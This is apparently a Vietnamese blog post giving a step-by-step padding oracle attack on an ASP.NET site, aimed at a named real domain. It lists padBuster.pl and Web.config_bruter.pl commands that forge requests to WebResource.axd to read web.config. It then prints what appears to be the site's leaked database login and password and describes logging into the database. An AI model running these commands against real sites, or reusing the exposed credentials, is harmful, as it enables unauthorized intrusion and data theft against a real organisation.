Chủ Nhật, 31 tháng 3, 2013

Padding Orale Attack





 
Kiểm tra lỗi Padding Orale



View source:



Chú ý đoạn code sau:
/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&t=634538991637902500" 


Bước 1: Chuẩn bị Tools

Trước tiên cần cài đặt perl:

Coppy 2 file  padBuster.pl và Web.config_bruter.pl sau vào ổ C:

padBuster.pl:
Web.config_bruter.pl:
pass unlock: soleil_vhb
pass giải nén: ceh.vn





Bước 2:  Thực hiện lệnh trên CMD

vào Run command

Cd\

Chạy lệnh:
padBuster.pl http://bigc.vn/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2 OpduU2rj_NJHaBhjNiUZ7g2 8 -encoding 3 -plaintext "|||~/web.config"





Đến bước này đợi 1 lát, nó sẽ chạy cho đến dòng:

“The ID# marked with **  is recommended: “

Lúc này ta sẽ nhập số 2 và ấn enter






Chờ đợi tầm 30 phút chương trình sẽ giải mã ra giá trị sau:

M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0




Sau khi có giá trị kết quả giải mã, thực hiện tiếp câu lệnh:

Web.config_bruter.pl http://bigc.vn/WebResource.axd M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0 8

Đợi chương trình biên dịch xong ( Tầm 1 tiếng ) ta sẽ có kết quả như sau: 






Kết quả: 

 u2LzoCD0ZcozT5Dq9vm iJY9gkwLdZ1xCAAAAAAAAAAA1

 gPdbQmmzWIEzT5Dq9vmiJY9gkwLdZ1xCAAAAAAAAAAA1

Mỗi lần biên dịch, chương trình sẽ cho ra 1 giá trị khác nhau nhưng link đều đưa về cùng 1 kết quả




Bước 3: Lấy thông tin file config:


hoặc:

Ta được thông tin sau: ID=bigc;Password=RrmX6W6ODi





Bước 4: login vào Database




Sử dụng tool: MySQL management studio express









0 nhận xét:

Đăng nhận xét